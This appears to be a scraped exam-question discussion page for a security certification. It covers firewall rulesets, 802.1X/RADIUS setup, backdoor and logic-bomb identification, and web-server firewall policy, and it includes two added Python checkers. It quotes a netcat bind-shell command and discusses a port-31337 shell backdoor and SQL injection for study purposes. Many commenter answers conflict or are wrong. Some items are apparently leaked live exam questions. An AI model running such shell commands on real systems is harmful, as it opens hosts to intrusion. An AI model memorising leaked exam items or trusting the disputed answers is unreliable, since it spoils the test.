Management - ANY --> 10.0.1.1/24 --> SSH --> PERMIT
HTTPS Inbound - ANY --> 10.0.1.1/24 --> HTTPS --> PERMIT
HTTP Inbound - ANY --> 10.0.1.1/24 --> HTTP --> DENY
Firewall 3:
DNS Rule - 192.168.0.1/24 --> 10.0.0.1/24 --> DNS --> PERMIT
HTTPS Outbound - 192.168.0.1/24 --> ANY --> HTTPS --> PERMIT
Management - ANY --> 192.168.0.1/24 --> SSH --> PERMIT
HTTPS Inbound - ANY --> 192.168.0.1/24 --> HTTPS --> PERMIT
HTTP Inbound - ANY --> 192.168.0.1/24 --> HTTP --> DENY
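
An added example (not from ExamTopics or the exam): a first-match evaluator for the DR-site firewall (Firewall 3) that checks the three tasks, deny cleartext web, secure management and working DR browsing. The "before" ruleset (HTTP permitted, Telnet management, DNS rule with the main-site source) follows the discussion's description and is an assumption, as is the documentation-range probe address.

```python
from ipaddress import ip_address, ip_network

# Rule = (name, source, destination, service, action). Evaluation is first-match
# and, as the task states, the order cannot be changed, so only fields are edited.
FW3_BEFORE = [
    ("DNS Rule",       "10.0.0.1/24",    "ANY",            "DNS",    "PERMIT"),  # wrong source subnet
    ("HTTPS Outbound", "192.168.0.1/24", "ANY",            "HTTPS",  "PERMIT"),
    ("Management",     "ANY",            "192.168.0.1/24", "TELNET", "PERMIT"),  # cleartext management
    ("HTTPS Inbound",  "ANY",            "192.168.0.1/24", "HTTPS",  "PERMIT"),
    ("HTTP Inbound",   "ANY",            "192.168.0.1/24", "HTTP",   "PERMIT"),  # cleartext web allowed
]

FW3_AFTER = [
    ("DNS Rule",       "192.168.0.1/24", "ANY",            "DNS",    "PERMIT"),
    ("HTTPS Outbound", "192.168.0.1/24", "ANY",            "HTTPS",  "PERMIT"),
    ("Management",     "ANY",            "192.168.0.1/24", "SSH",    "PERMIT"),
    ("HTTPS Inbound",  "ANY",            "192.168.0.1/24", "HTTPS",  "PERMIT"),
    ("HTTP Inbound",   "ANY",            "192.168.0.1/24", "HTTP",   "DENY"),
]

# Services that carry credentials or content in the clear.
CLEARTEXT_SERVICES = {"HTTP", "TELNET"}


def _matches(field, ip):
    """ANY matches everything; otherwise the host must lie inside the rule's subnet."""
    return field == "ANY" or ip_address(ip) in ip_network(field, strict=False)


def evaluate(rules, src, dst, service):
    """Return (action, rule name) of the first matching rule; unmatched traffic is implicitly denied."""
    for name, rule_src, rule_dst, rule_svc, action in rules:
        if rule_svc == service and _matches(rule_src, src) and _matches(rule_dst, dst):
            return action, name
    return "DENY", "implicit"


def audit(rules, site_subnet, outside_ip="203.0.113.10"):
    """Check one firewall's ruleset against the three tasks; returns a list of findings.

    outside_ip is a constructed address from the documentation range, used to probe
    what a host on site_subnet can reach on the Internet.
    """
    findings = []
    # Tasks 1 and 2: no permitted cleartext web traffic and no cleartext management.
    for name, _src, _dst, svc, action in rules:
        if svc in CLEARTEXT_SERVICES and action == "PERMIT":
            findings.append(f"{name}: permits cleartext {svc}")
    # Task 3: browsing from the site needs both name resolution and HTTPS outbound.
    probe_host = str(ip_network(site_subnet, strict=False)[10])
    for svc in ("DNS", "HTTPS"):
        action, matched = evaluate(rules, probe_host, outside_ip, svc)
        if action != "PERMIT":
            findings.append(f"outbound {svc} from {site_subnet} hits {matched} deny")
    return findings


if __name__ == "__main__":
    for label, rules in (("before", FW3_BEFORE), ("after", FW3_AFTER)):
        print(label, audit(rules, "192.168.0.1/24") or "OK")
```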

  axvfrance Highly Voted  1 year, 5 months ago


Hi everyone! After reading those comments, in my opinion this is the correct answer:
Firewall 1:
10.0.0.1/24 - ANY - DNS - PERMIT
10.0.0.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.0.1/24 - SSH - PERMIT
ANY - 10.0.0.1/24 - HTTPS - PERMIT
ANY - 10.0.0.1/24 - HTTP - DENY

Firewall 2:
10.0.1.1/24 - ANY - DNS - PERMIT
10.0.1.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.1.1/24 - SSH - PERMIT
ANY - 10.0.1.1/24 - HTTPS - PERMIT
ANY - 10.0.1.1/24 - HTTP - DENY

Firewall 3:
192.168.0.1/24 - ANY - DNS - PERMIT
192.168.0.1/24 - ANY - HTTPS - PERMIT
ANY - 192.168.0.1/24 - SSH - PERMIT
ANY - 192.168.0.1/24 - HTTPS - PERMIT
ANY - 192.168.0.1/24 - HTTP - DENY
upvoted 54 times

  HypeMan_crew 2 months, 2 weeks ago


I think this is correct. If there was "10.0.0.254/24" in both the source and destination drop-downs, then there would have been some slight
changes made in firewall 2 configurations.
This has to be the correct answer!
upvoted 1 times

  oooMooo 1 year, 4 months ago


There should be no changes to Firewall 2 as the issue you're trying to fix is associated with web browsing. Firewall 2 manages the email
server.
upvoted 3 times

  LeadBasedPaint 1 year, 3 months ago


We don't know what the "default" settings of Firewall #2 are. The question specifically states that we are to "ensure secure management protocols are used." So, *at least* check Firewall #2 to make sure SSH management is enabled.
upvoted 8 times

  1Kbit 10 months, 2 weeks ago


by default for Firewall2 Management, I had telnet so I changed it to ssh
upvoted 7 times

  Xemnas Highly Voted  1 year, 12 months ago


why not?
DNS Rule - ANY --> ANY --> DNS --> PERMIT
HTTPS Outbound - 10.0.0.1/24 --> ANY --> HTTPS --> PERMIT
Management - ANY --> ANY --> SSH --> PERMIT
HTTPS Inbound - ANY --> 10.0.0.1/24 --> HTTPS --> PERMIT
HTTP Inbound - ANY --> ANY --> HTTP --> DENY
Firewall 2: No changes should be made to this firewall
Firewall 3:
DNS Rule - ANY --> ANY --> DNS --> PERMIT
HTTPS Outbound - 192.168.0.1/24 --> ANY --> HTTPS --> PERMIT
Management - ANY --> ANY --> SSH --> PERMIT
HTTPS Inbound - ANY --> 192.168.0.1/24 --> HTTPS --> PERMIT
HTTP Inbound - ANY --> ANY --> HTTP --> DENY
upvoted 28 times

  deeden 4 months, 2 weeks ago


Understanding a little bit about networking, I believe this config will achieve the same objective as the model answer. Although, for Firewall 2, the email server will need DNS and SSH to be permitted; I'm not sure if it needs an HTTP/HTTPS permit, unless it's providing webmail services.
In any case, emails will be down if the main datacenter router dies.
upvoted 2 times

  [Removed] 1 year, 8 months ago


I believe this is wrong. Why would Firewall 1 source be configured to "Any" when the only device connected to the firewall is the Web Server?
upvoted 6 times

  charlier 1 year ago


Because a /24 means you're permitting traffic to everything on that VLAN/subnet, basically equivalent to "Any"... The answer you're thinking of, correctly and professionally, would be configured as a /32 (255.255.255.255). This question also omits interfaces, scopes and other things, so I guess try not to overthink it.
upvoted 5 times

  xMilkyMan123 1 year, 11 months ago


The keyword is "Outbound"; this means its source will be inside the network and the destination will be ANY.

I was also a bit confused at first with this one.
upvoted 2 times


  peymani 1 year, 10 months ago


he/she said https inbound
upvoted 2 times

  ash 1 year, 9 months ago


Is this correct? I'm confused.
upvoted 1 times

  sanlibo Most Recent  1 week, 1 day ago


passed the exam last Wednesday

Take note:
-I did not configure the WHOLE of firewalls 1, 2 and 3, as they are already preconfigured. You will just need to fix the wrong config.
-HTTP inbound is permitted. Change it to Deny.
-I did not make any changes on Firewall 2.
-On FW3, change the DNS rule to the correct "Source" IP.

This is what the answer looks like after changing some of the config.

Firewall 1:
10.0.0.1/24 - ANY - DNS - PERMIT
10.0.0.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.0.1/24 - SSH - PERMIT
ANY - 10.0.0.1/24 - HTTPS - PERMIT
ANY - 10.0.0.1/24 - HTTP - DENY

Firewall 2:
10.0.1.1/24 - ANY - DNS - PERMIT
10.0.1.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.1.1/24 - SSH - PERMIT
ANY - 10.0.1.1/24 - HTTPS - PERMIT
ANY - 10.0.1.1/24 - HTTP - DENY

Firewall 3:
192.168.0.1/24 - ANY - DNS - PERMIT
192.168.0.1/24 - ANY - HTTPS - PERMIT
ANY - 192.168.0.1/24 - SSH - PERMIT
ANY - 192.168.0.1/24 - HTTPS - PERMIT
ANY - 192.168.0.1/24 - HTTP - DENY
upvoted 1 times

  Sandon 1 week ago


Thank you sir
upvoted 1 times

  KingTre 1 month, 2 weeks ago


Took the test on Saturday. I passed! All of the PBQs were on the test, BUT only about 3 MC questions came from this study guide. Know your material if you want to pass. Memorizing this will not help.
upvoted 1 times

  JustInTime23 1 month, 3 weeks ago


if you had "ANY" for management as the source, couldn't anyone potentially SSH into your network? Wouldn't you just want management from
within specific networks?
upvoted 1 times

  ostralo 3 months, 3 weeks ago


One thing about the DNS rule (ref: https://upcloud.com/resources/tutorials/dns-servers):
as you can see in the ref, the servers must be able to receive DNS responses. If you allow only outbound DNS traffic, the servers cannot receive DNS responses, which means when you update the servers, you cannot connect to online sources.

So, I would go for this.

FW1
DNS rule ANY - ANY - DNS - PERMIT
Https out 10.0.0.1/24 - ANY - HTTPS - PERMIT
Management ANY - 10.0.0.1/24 - SSH - PERMIT
https in ANY - 10.0.0.1/24 - HTTPS - PERMIT
Http in ANY - 10.0.0.1/24 - HTTP - DENY

FW2
DNS rule ANY - ANY - DNS - PERMIT
Https out 10.0.1.1/24 - ANY - HTTPS - PERMIT
Management ANY - 10.0.1.1/24 - SSH - PERMIT
https in ANY - 10.0.1.1/24 - HTTPS - PERMIT
Http in ANY - 10.0.1.1/24 - HTTP - DENY

FW3
DNS rule ANY - ANY - DNS - PERMIT
Https out 192.168.0.1/24 - ANY - HTTPS - PERMIT
Management ANY - 192.168.0.1/24 - SSH - PERMIT
https in ANY - 192.168.0.1/24 - HTTPS - PERMIT
Http in ANY - 192.168.0.1/24 - HTTP - DENY
upvoted 2 times

  ostralo 3 months, 3 weeks ago


Correction on the last config:
Http in ANY - ANY - HTTP - DENY
This would make it easier to add another server to the segment. No worry about HTTP at all.
upvoted 1 times

  vimone 5 months, 3 weeks ago


Firewall 1:
10.0.0.1/24 - ANY - DNS - PERMIT
10.0.0.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.0.1/24 - SSH - PERMIT
ANY - 10.0.0.1/24 - HTTPS - PERMIT
ANY - 10.0.0.1/24 - HTTP - DENY

Firewall 2:
10.0.1.1/24 - ANY - DNS - PERMIT
10.0.1.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.1.1/24 - DNS - PERMIT
ANY - 10.0.1.1/24 - HTTPS - PERMIT
ANY - 10.0.1.1/24 - HTTP - DENY

Firewall 3:
192.168.0.1/24 - ANY - DNS - PERMIT
192.168.0.1/24 - ANY - HTTPS - PERMIT
ANY - 192.168.0.1/24 - SSH - PERMIT
ANY - 192.168.0.1/24 - HTTPS - PERMIT
ANY - 192.168.0.1/24 - HTTP - DENY

Note: Firewall 2 is the email server, so the management is DNS permit, not SSH
upvoted 5 times

  db97 4 months, 1 week ago


DNS for management? I don't think so
upvoted 1 times

  Jatinder025 5 months, 3 weeks ago


Has anyone who has taken the exam recently (Aug 2022) figured out the correct answer? It seems like everyone is using their own combination of the answers.
upvoted 4 times

  MarkMcE1 5 months, 3 weeks ago


What section is this under? What's the best video to understand this?
upvoted 1 times

  webmaster147 6 months, 1 week ago


Correct Answer
upvoted 1 times

  Edyspbrazil 6 months, 1 week ago


Hi mates, if you want to know about rules: https://community.checkpoint.com/t5/Management/Layers-and-the-cleanup-rule/td-p/6553

Firewall 1:
10.0.0.1/24 - ANY - DNS - PERMIT
10.0.0.1/24 - ANY - HTTPS - PERMIT
upvoted 1 times

  Svol 7 months, 1 week ago


Finished my exam 5 minutes ago and only the first two simulations were on my exam; the remaining 73 questions and simulations were different.
HOWEVER... I still passed because you need to read all of the comments by people here. That's the only damn reason I passed.
upvoted 8 times

  Skydragon207 6 months, 1 week ago


hi, do you have a discord that I can dm you questions?
upvoted 2 times

  Svol 7 months, 1 week ago


Finished my exam 5 minutes ago and only the first two simulations were on my exam AND NOTHING ELSE... NO OTHER QUESTION WAS ON
MY EXAM. The remaining 73 questions and simulations had nothing even remotely similar to any of the 357 remaining questions on this site.
upvoted 3 times

  CLAW_ 7 months, 1 week ago


Took my test last week Thursday and passed with 800. This question was 100% on there; in fact it was the first question. I went with the below and MAKE SURE YOU CHECK FIREWALL 2!!! Change it from Telnet to SSH.

Firewall 1:
10.0.0.1/24 - ANY - DNS - PERMIT
10.0.0.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.0.1/24 - SSH - PERMIT
ANY - 10.0.0.1/24 - HTTPS - PERMIT
ANY - 10.0.0.1/24 - HTTP - DENY

Firewall 2:
10.0.1.1/24 - ANY - DNS - PERMIT
10.0.1.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.1.1/24 - SSH - PERMIT
ANY - 10.0.1.1/24 - HTTPS - PERMIT
ANY - 10.0.1.1/24 - HTTP - DENY

Firewall 3:
192.168.0.1/24 - ANY - DNS - PERMIT
192.168.0.1/24 - ANY - HTTPS - PERMIT
ANY - 192.168.0.1/24 - SSH - PERMIT
ANY - 192.168.0.1/24 - HTTPS - PERMIT
ANY - 192.168.0.1/24 - HTTP - DENY
upvoted 12 times

  CyborgTick 6 months, 2 weeks ago


I agree with you 100%, but at the DNS rule.. remember that
DNS lookups are OUTBOUND
DNS Queries are INBOUND
So I think DNS SHOULD be Any Any
upvoted 2 times

  Reactsean 7 months, 2 weeks ago


10000% on the test.
upvoted 2 times

  Serengeti 5 months, 2 weeks ago


Do we have 10000% in percentage?
upvoted 1 times

  Incredible99 8 months ago


On 05/24 exam.
upvoted 1 times

  eddie_network_jedi 9 months ago


appear on exam (May, the 3rd - 2022). Exam passed :)
upvoted 4 times

  hypertweeky 8 months, 4 weeks ago


Which combination did you use? Congrats!!’
upvoted 1 times


Question #155 Topic 1

SIMULATION -
An attack has occurred against a company.

INSTRUCTIONS -
You have been tasked to do the following:
✑ Identify the type of attack that is occurring on the network by clicking on the attacker's tablet and reviewing the output.
✑ Identify which compensating controls a developer should implement on the assets, in order to reduce the effectiveness of future attacks by
dragging them to the correct server.
All objects will be used, but not all placeholders may be filled. Objects may only be used once.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.


Correct Answer: See explanation below.

  stoneface Highly Voted  5 months ago


I think this is correct.
Application Source Code -> Code Review

CRM Server - > Record Level access Control

Web Server -> WAF and URL Filtering - I initially went with Input Validation instead of URL filtering, but URL filtering works by comparing all web
traffic against URL filters, which are typically contained in a database of sites that users are permitted to access or denied from accessing.

Database ->Input validation


upvoted 20 times

  deeden 4 months, 2 weeks ago


Agreed. The answer is correct. The response page doesn't seem to be consistent with any of the possible output using the other attacks.
Found this link from way back SY0-401 blog.
https://blogs.getcertifiedgetahead.com/cookie-attacks-security/
upvoted 2 times

  stoneface 5 months ago


For the attack I think this is a SQLi attack
upvoted 4 times

  Knowledge33 3 months ago


It's not mentioned in the question that the database is using SQL. It could be Oracle or anything else. It means SQLi is not correct. The only possibility is an XSS attack.
upvoted 1 times

  Lionel_TheITGuy 2 weeks, 4 days ago


Oracle dbs use a sql structure though.
upvoted 3 times

  KetReeb 5 months ago


Why not Session Hijacking? The output shows that the table used multiple accounts and the session cookies associated with the account
IDs.
upvoted 1 times

  stoneface 5 months ago


Very true. After digging around (again), this could be a Session Hijacking attack, and also an XSS attack - https://owasp.org/www-community/attacks/Session_hijacking_attack

But a session hijacking attack or an XSS would not reveal session IDs for multiple users; besides, there are additional fields in the response (name, login_time), and this is information that will typically be stored in a database.

I still believe this is a SQLi attack ... I listen to you.
upvoted 6 times

  anonimouse2 5 months ago


It is a XSS attack. Check diagram here: https://www.imperva.com/learn/application-security/cross-site-scripting-xss-attacks/


upvoted 5 times

  andrizo 3 months, 3 weeks ago


xss steals cookies that contain session data, thank you very much!
upvoted 1 times

  inkedia3 Highly Voted  4 months, 1 week ago


Wrote the exam yesterday and passed. Please pay attention to these PBQs; they were all on the exam. Funny, I wasn't paying much attention to them till about three hours before my exam. Anyway, I passed with a 785 score... I will say give these questions 90% of your attention and look for the 10% from other sources...
upvoted 15 times

  nobnarb Most Recent  2 months, 2 weeks ago


The answer is cross-site scripting; this is from Darril Gibson's website.
Q. A penetration tester has successfully exploited a vulnerability against your organization giving him access to the following data:

User, password, login-date, cookie-id
Homer, canipass, 2016-09-01 11:12, 286755fad04869ca523320acce0dc6a4
Bart, passican, 2016-09-01 11:15, 8edd7261c353c87a113269cd37635c68
Marge, icanpass, 2016-09-01 11:19, 26887fbd90ac0340e29ad62470270401

What type of attack does this represent?

A. SQL injection

B. XML injection

C. XSS

D. Session hijacking

Answer: C. Cross-site scripting (XSS) is the best choice of the available answers. You can see that the penetration tester is looking at cookies
because the header includes ‘cookie-id’ and successful cross-site scripting (XSS) attacks allow attackers to capture user information such as
cookies.
upvoted 7 times

  J_Ark1 2 months, 4 weeks ago


Definitely cross-site scripting, because the end user is being attacked. The main difference between a SQL and an XSS injection attack is that SQL injection attacks are used to steal information from databases, whereas XSS attacks are used to redirect users to websites where attackers can steal data from them. SQL injection is database-focused, whereas XSS is geared towards attacking end users. So definitely XSS, since the end user is affected.
upvoted 2 times

  J_Ark1 2 months, 4 weeks ago


notice the http header
upvoted 1 times

  apata123 3 months ago


This appeared in my exam today, I choose Session hijacking to be the attack… I passed my exam
upvoted 2 times

  banditring 4 months, 2 weeks ago


what is a CRM server?
upvoted 2 times

  Jakalan7 4 months, 2 weeks ago


Google is your friend. CRM stands for customer relationship management, it's where companies store information about their customers, so
it's a database.
upvoted 2 times

  redsidemanc2 4 months, 4 weeks ago


I think it's SQLi just because it's saying input validation. You put input validation on a database to prevent 1=1 etc.
upvoted 3 times

  enginne 4 months, 4 weeks ago


In this scenario we recommend input validation for DB as compensating control - SQL Injection
upvoted 1 times

  mark9999 5 months ago


Application Source Code -> Code Review
CRM Server - > Record Level access Control
Web Server -> WAF and URL Filtering
Database ->Input validation
All the same as stoneface put. I think he might be correct with SQL injection as well, as the output shows all the users' data, which is exactly what you get when using OR 1=1, or apostrophes in the WHERE clause to cause it to evaluate to TRUE. The session IDs are just part of the column output, a bit of a red herring.
upvoted 4 times


  Ribeiro19 5 months ago


SQLi attack
web server - WAF URL Filtering
Database - Record Level Access control
app repository (with code) - Code Review, Input Validation
CRM server - NAN
upvoted 4 times

  Ribeiro19 5 months ago


This is a SQLi attack, because with one request the hacker gets multiple accounts and the session cookies associated with the account IDs. And it is not a Session Hijacking attack, because that is the next step of the attack. First exfiltrate the info with the SQLi attack, and then create payloads to do a Session Hijacking attack.

My question: what is a CRM Server? Or what does this server do in an application?
upvoted 3 times


Question #156 Topic 1

SIMULATION -
A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802.1X
using the most secure encryption and protocol available.

INSTRUCTIONS -
Perform the following steps:
4. Configure the RADIUS server.
5. Configure the WiFi controller.
6. Preconfigure the client for an incoming guest. The guest AD credentials are:

User: guest01 -

Password: guestpass -
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.


Correct Answer: See explanation below.


Configure the settings as shown below:

  DUCKDOG Highly Voted  5 months ago


Wifi Controller
SSID: CORPGUEST
SHARED KEY: Secret
AAA server IP: 192.168.1.20
PSK: Blank
Authentication type: WPA2-EAP-PEAP-MSCHAPv2
Controller IP: 192.168.1.10

Radius Server
Shared Key: Secret
Client IP: 192.168.1.10
Authentication Type: Active Directory
Server IP: 192.168.1.20

Wireless Client
SSID: CORPGUEST
Username: guest01
Userpassword: guestpass
PSK: Blank
Authentication type: WPA2-Enterprise
upvoted 28 times

  Juraj22 2 months ago


Absolutely right, from a network admin. And this is the answer for everybody: if you are using WiFi and RADIUS, you can't use WPA2-PSK... WPA2-PSK is for password sharing; for authentication via RADIUS and Active Directory, you have to use EAP-PEAP-MSCHAPv2 :) And I am 100% sure. So this solution is really OK. And last thing, the end user (client) has to know only the username and password for the client, nothing more... In other words (there is an authentication server, RADIUS, and an authenticator, the wireless controller; they have to know the secret key, but the client only the username and password).
upvoted 5 times


  andrizo 3 months, 3 weeks ago


Would you mind explaining the auth type = EAP-PEAP; WPA2-Enterprise? I think I know why a pre-shared key would not be used here.
upvoted 1 times

  Juraj22 2 months ago


Yes, in this scenario you have 3 types of devices, called the authentication server (RADIUS or TACACS), the authenticator (AP controller, or switches, or AP in standalone mode and so on) and the last one is the client. And everything is about that: if a client wants to join the network, he must contact the authenticator (switch via ethernet cable, or AP via wireless), and in this contact is the username and password. The authenticator (switch, or in this scenario the AP controller) takes these credentials and sends them to RADIUS; RADIUS then checks this user and his password, and if everything is OK, then it sends an accept message to the authenticator, and the authenticator to the client, and the client can have full access to the network. If not, he will be rejected. This is only in general, there are more steps, but the idea is that everything is going via EAP :) not WPA2-PSK
upvoted 4 times
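
An added example (not from ExamTopics or the exam) that cross-checks the three components the discussion above describes: the controller must point at the RADIUS server, RADIUS must list the controller as its client with the same shared secret, the controller's EAP mode must pair with the client's Enterprise mode, and no PSK belongs in a RADIUS-backed setup. The dropdown options, SSID, IPs and shared key are taken from the discussion's reading of the simulation and are assumptions, as is the weakest-to-strongest ordering.

```python
# Controller authentication options as reported in the discussion, ordered weakest to
# strongest (assumption); the task asks for the most secure protocol available.
CONTROLLER_OPTIONS = ["OPEN", "WEP", "WPA-PSK", "WPA-EAP-PEAP-MSCHAPv2",
                      "WPA2-PSK", "WPA2-EAP-PEAP-MSCHAPv2"]

# Controller 802.1X mode -> the client-side mode that pairs with it.
ENTERPRISE_PAIRS = {"WPA2-EAP-PEAP-MSCHAPv2": "WPA2-Enterprise",
                    "WPA-EAP-PEAP-MSCHAPv2": "WPA-Enterprise"}


def strongest(options):
    """Strongest option according to the CONTROLLER_OPTIONS ordering."""
    return max(options, key=CONTROLLER_OPTIONS.index)


def check_8021x(controller, radius, client):
    """Return a list of misconfigurations across controller, RADIUS server and client."""
    findings = []
    # The authenticator (controller) and authentication server (RADIUS) must point at
    # each other and share the same secret.
    if controller["aaa_server_ip"] != radius["server_ip"]:
        findings.append("controller's AAA server IP is not the RADIUS server")
    if radius["client_ip"] != controller["controller_ip"]:
        findings.append("RADIUS client (NAS) IP is not the controller")
    if controller["shared_key"] != radius["shared_key"]:
        findings.append("RADIUS shared secret differs between controller and server")
    if client["ssid"] != controller["ssid"]:
        findings.append("client SSID does not match the controller")
    mode = controller["auth_type"]
    if mode != strongest(CONTROLLER_OPTIONS):
        findings.append(f"controller uses {mode}, not the strongest available mode")
    if mode not in ENTERPRISE_PAIRS:
        findings.append(f"{mode} never consults RADIUS, so the AD guest account is unused")
    elif client["auth_type"] != ENTERPRISE_PAIRS[mode]:
        findings.append("client authentication type does not pair with the controller's EAP mode")
    # With per-user 802.1X authentication there is no pre-shared key to configure.
    if controller["psk"] or client["psk"]:
        findings.append("a PSK is set although users authenticate individually via RADIUS")
    if radius["auth_type"] != "Active Directory":
        findings.append("RADIUS backend is not AD, but the guest credentials are AD credentials")
    return findings


# Constructed from the discussion's reading of the simulation (values are assumptions).
PROPOSED = dict(
    controller=dict(ssid="CORPGUEST", shared_key="Secret", aaa_server_ip="192.168.1.20",
                    psk="", auth_type="WPA2-EAP-PEAP-MSCHAPv2", controller_ip="192.168.1.10"),
    radius=dict(shared_key="Secret", client_ip="192.168.1.10",
                auth_type="Active Directory", server_ip="192.168.1.20"),
    client=dict(ssid="CORPGUEST", username="guest01", password="guestpass",
                psk="", auth_type="WPA2-Enterprise"),
)

# The same settings with the controller on WPA2-PSK and a PSK filled in on both ends,
# the alternative some commenters proposed.
PSK_VARIANT = {name: dict(part) for name, part in PROPOSED.items()}
PSK_VARIANT["controller"].update(auth_type="WPA2-PSK", psk="Johnknows@123")
PSK_VARIANT["client"].update(psk="Johnknows@123")

if __name__ == "__main__":
    print("proposed:", check_8021x(**PROPOSED) or "OK")
    print("psk variant:", check_8021x(**PSK_VARIANT))
```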

  ostralo Highly Voted  3 months, 3 weeks ago


Wifi Controller
SSID - CORPGUEST
Shared key - SECRET (from Radius server)
AAA server IP - 192.168.1.20
PSK - N/A?
Authentication type - WPA2-EAP-PEAP-MSCHAPv2

Radius Server
Shared Key - SECRET
Client IP - 192.168.1.10(Controller IP)
Authentication type - Active Directory(the guest account was created in AD)
Server IP - 192.168.1.20

Wireless Client
SSID - CORPGUEST
Username - guest01
User password - guestpass
PSK - N/A?
Authentication type - WPA2-Enterprise
upvoted 7 times

  apata123 Most Recent  3 months ago


This came in my exam, please take this Pbqs serious…
upvoted 3 times

  CloudGrogu 4 months, 1 week ago


What are the pulldown options for this question?
upvoted 1 times

  serginljr 4 months ago


WiFi Controller:
Authentication type drop down:
OPEN
WPA-EAP-PEAP-MSCHAPv2
WPA-PSK
WPA2-EAP-PEAP-MSCHAPv2
WPA2-PSK
WEP

Radius Server:
Authentication type drop down:
LOCAL
Active Directory
MSSQL

Wireless Client
Authentication type drop down:
OPEN
WPA-PSK
WEP
WPA2-PSK
WPA2-Enterprise
WPA-Enterprise
upvoted 5 times

  andrizo 3 months, 3 weeks ago


We're just picking the strongest auth type then?
upvoted 3 times

  deeden 4 months, 1 week ago


Suggestions were quite confusing due to drop down options not being shown here (i.e. Authentication type). Also, I can't find any reference of
PSK being asked on any of the references I found on the net.
Sample link below.
https://documentation.meraki.com/MR/Encryption_and_Authentication/Configuring_RADIUS_Authentication_with_WPA2-Enterprise


upvoted 1 times
  comeragh 5 months ago
Wifi Controller
AAA Server IP: 192.168.1.20
PSK: Johnknows@123 (if you need to enter something)
Authentication Type: WPA2-PSK

Radius Server
Client IP: 192.168.1.10
Authentication Type: Active Directory

Wireless Client:
SSID: CORPGUEST
Username: guest01
Password: guestpass
PSK: Johnknows@123 (if you need to enter something)
Authentication Type: WPA2-Enterprise
upvoted 5 times

  Phasmid 4 months, 1 week ago


I'm still trying to learn all of this stuff. Could you by any chance give me a clue as to how you knew what IP addresses to fill in?
upvoted 2 times

  _Tyler_ 4 months, 1 week ago


The given info gives most of the answers away. For example, for the AAA server IP you would input the only other IP given in the question, so this would be the IP of your RADIUS server, and vice versa.
upvoted 4 times


Question #157 Topic 1

HOTSPOT -
An incident has occurred in the production environment.

INSTRUCTIONS -
Analyze the command outputs and identify the type of compromise.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:


Correct Answer:

  stoneface Highly Voted  5 months ago


Logic Bomb and Backdoor

The first compromise relies on a cron job that will be executed every five minutes.
The second compromise is opening port 31337. https://www.eicar.org/download/eicar.com.txt is a file to test AV products; instead of using real malware, which could cause real damage, this test file allows people to test anti-virus software without having to use a real computer virus.
upvoted 23 times

  rhocale 1 month, 2 weeks ago


This is incorrect. The nc gives it away for the second one: nc, the RAT, is always listening.
upvoted 1 times

  stonefaces_kitten 2 months, 2 weeks ago


Thank you for this! I agree
upvoted 1 times

  andrizo 3 months, 3 weeks ago



My first thought for the first one was SQL, but maybe not.
upvoted 1 times

  varun0 5 months ago


The second compromise is opening a port which can be connected to; when you connect to it, it gives you a bash shell.

I think it's a RAT?


upvoted 1 times

  varun0 5 months ago


Disregard this, you are correct
upvoted 3 times

  Lyeen Most Recent  1 month, 3 weeks ago


Logic Bomb and Rat
upvoted 3 times

  pgonza 1 month, 3 weeks ago


1 is a logic bomb. Whenever some condition must be true for the execution, it's a logic bomb.
2 is a backdoor. Netcat can be used to establish backdoor connections to any TCP/UDP port as shown in the command. It is not a RAT because
a trojan has to be fully functional software but with malicious intent. The user has to deliberately install it.
upvoted 1 times

  dr_fog 2 months ago


Logic Bomb and Rat
upvoted 1 times

  ahmedhablas 2 months, 3 weeks ago


I think the second one is RAT.
The term “RAT” (Remote Access Tool) can be considered a synonym to “backdoor”, but it usually signifies a full bundle including a client
application meant for installation on the target system, and a server component that allows administration and control of the individual 'bots' or
compromised systems.
upvoted 1 times

  lift 2 months, 3 weeks ago


The first answer says rootkit, BUT isn't it a logic bomb?
upvoted 3 times

  Zaado 3 months, 2 weeks ago


To make it easy for you guys:
if = logic bomb (since a logic bomb executes once a condition is met)
nc = RAT
upvoted 3 times

  Samxi92 3 months, 2 weeks ago


"Netcat can also establish connections with remote machines. To configure Netcat as a
backdoor, you first set up a listener on the victim system (IP: 10.1.0.1) set to pipe traffic
from a program, such as the command interpreter, to its handler:
nc -l -p 666 -e cmd.exe"

CompTIA Guide
upvoted 6 times

  J_Ark1 2 months, 4 weeks ago


Such a command is not present in the example, which hence makes it a RAT.
upvoted 1 times

  Zaado 3 months, 1 week ago


I'm not going to lie, I am debating whether it is either a backdoor or a rat since both are so similar because both give you access to a
remote system.
upvoted 2 times

  NICKJONRIPPER 2 months, 1 week ago


"file.sh" is RAT, "backdoor.sh" is backdoor
upvoted 2 times

  Sandon 1 week, 4 days ago


That is incorrect
upvoted 1 times

  CertAddict69 4 months, 2 weeks ago


Logic Bomb First and RAT Second
upvoted 2 times

  J_Ark1 2 months, 4 weeks ago


please explain


upvoted 1 times


Question #158 Topic 1

After a recent security incident, a security analyst discovered that unnecessary ports were open on a firewall policy for a web server. Which of the
following firewall policies would be MOST secure for a web server?
A.

B.

C.

D.

Correct Answer: D

  stoneface Highly Voted  5 months ago


D)
Any -> Any -> TCP 80 Allow
Any -> Any -> TCP 443 Allow
Any -> Any -> ANY Deny

Although allowing 80 is not secure, it is the best answer of all


upvoted 22 times

  banditring 5 months ago


Why? If C is saying deny for port 80?
upvoted 2 times

  NICKJONRIPPER 2 months, 1 week ago


It only denies one insecure port, 80, but allows all other insecure ports, like 23, 8080, etc.
upvoted 2 times

  Smeevil 4 months, 4 weeks ago


Because C allows any other traffic in the last line
upvoted 3 times

  jgp 4 months, 4 weeks ago


Because in C you are opening any port by Allowing by default with the ANY -> ANY -> ANY -> Allow
upvoted 2 times

  SecurityArt Most Recent  2 months, 3 weeks ago


It's D
Last line is
Any --> Any --> Any --> Deny
upvoted 1 times

  Iphy23 3 months, 1 week ago


The most correct answer is D
upvoted 2 times

  chael88 4 months ago


This one was not in my exam, but one very similar was. It asked to allow web server, SFTP and DHCP but specifically block FTP. The answer was the one
with port 21 blocked.


